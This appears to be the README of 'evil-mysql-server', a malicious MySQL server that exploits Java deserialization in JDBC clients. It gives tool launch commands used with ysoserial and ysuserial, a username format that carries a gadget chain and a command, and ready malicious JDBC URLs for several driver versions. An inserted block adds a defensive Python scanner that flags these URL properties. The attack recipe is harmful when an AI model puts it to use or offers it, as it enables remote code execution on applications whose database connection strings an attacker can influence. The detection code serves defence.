dushixiang/evil-mysql-server


evil mysql server


Introduction

evil-mysql-server is a malicious MySQL server written to target JDBC deserialization vulnerabilities. It requires ysoserial.

Usage

ysoserial

./evil-mysql-server -addr 3306 -java java -ysoserial ysoserial-0.0.6-SNAPSHOT-all.jar

After a successful startup, connect with JDBC using a username in the format yso_payload_command. Once the connection succeeds, evil-mysql-server parses the username and sends malicious data back to the JDBC client, generated with the following command:

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections1 calc.exe

ysuserial

ysuserial is an enhanced project based on the original ysoserial.

./evil-mysql-server -addr 3306 -java java -ysuserial ysuserial-0.9-su18-all.jar

After a successful startup, connect with JDBC using a username in the format ysu_payload_command. Once the connection succeeds, evil-mysql-server parses the username and sends malicious data back to the JDBC client, generated with the following command:

java -jar ysuserial-0.9-su18-all.jar -g CommonsCollections1 -p calc.exe

JDBC url examples

5.1.11-5.x

jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_CommonsCollections1_calc.exe

6.x

jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_CommonsCollections1_calc.exe

8.x

jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_CommonsCollections1_calc.exe
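For defenders, the property combination in the URLs above is what to look for in application configs and in any connection string a user can influence. The scanner below is an added example, not code from this repository: the function names and sample URLs are constructed here, and lower-casing and percent-decoding the property names is a conservative assumption, not documented driver behaviour.

```python
from urllib.parse import unquote

# Property names, interceptor class and username prefixes come from this README.
INTERCEPTOR_KEYS = ("queryinterceptors", "statementinterceptors")
INTERCEPTOR_CLASS = "serverstatusdiffinterceptor"
USER_PREFIXES = ("yso_", "ysu_")

def parse_properties(jdbc_url):
    """Return the query-string properties of a jdbc:mysql URL, or None.

    Keys are lower-cased and keys/values percent-decoded: a conservative choice
    made here so re-cased or encoded variants are still inspected.
    """
    if not jdbc_url.lower().startswith("jdbc:mysql:"):
        return None
    props = {}
    for pair in jdbc_url.partition("?")[2].split("&"):
        key, _, value = pair.partition("=")
        if key:
            props[unquote(key).strip().lower()] = unquote(value).strip()
    return props

def findings(jdbc_url):
    """List the reasons a JDBC URL should be rejected or alerted on."""
    props = parse_properties(jdbc_url)
    if props is None:
        return []
    out = []
    if props.get("autodeserialize", "").lower() in ("true", "yes"):
        out.append("autoDeserialize enabled")
    for key in INTERCEPTOR_KEYS:
        if INTERCEPTOR_CLASS in props.get(key, "").lower():
            out.append(key + " loads ServerStatusDiffInterceptor")
    if props.get("user", "").lower().startswith(USER_PREFIXES):
        out.append("user matches yso_/ysu_ payload format")
    return out

# Constructed samples: the 8.x URL shape from above, an encoded 5.x variant, a benign URL.
SAMPLES = [
    "jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_CommonsCollections1_calc.exe",
    "jdbc:mysql://127.0.0.1:3306/test?auto%44eserialize=TRUE&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=app",
    "jdbc:mysql://db.internal.example:3306/app?useSSL=true&user=app",
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(findings(url) or "ok", "<-", url)
```

An application that builds JDBC URLs from untrusted input can call `findings()` before connecting and refuse any URL for which it returns a non-empty list.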

Thanks

Thanks to the following projects for the inspiration
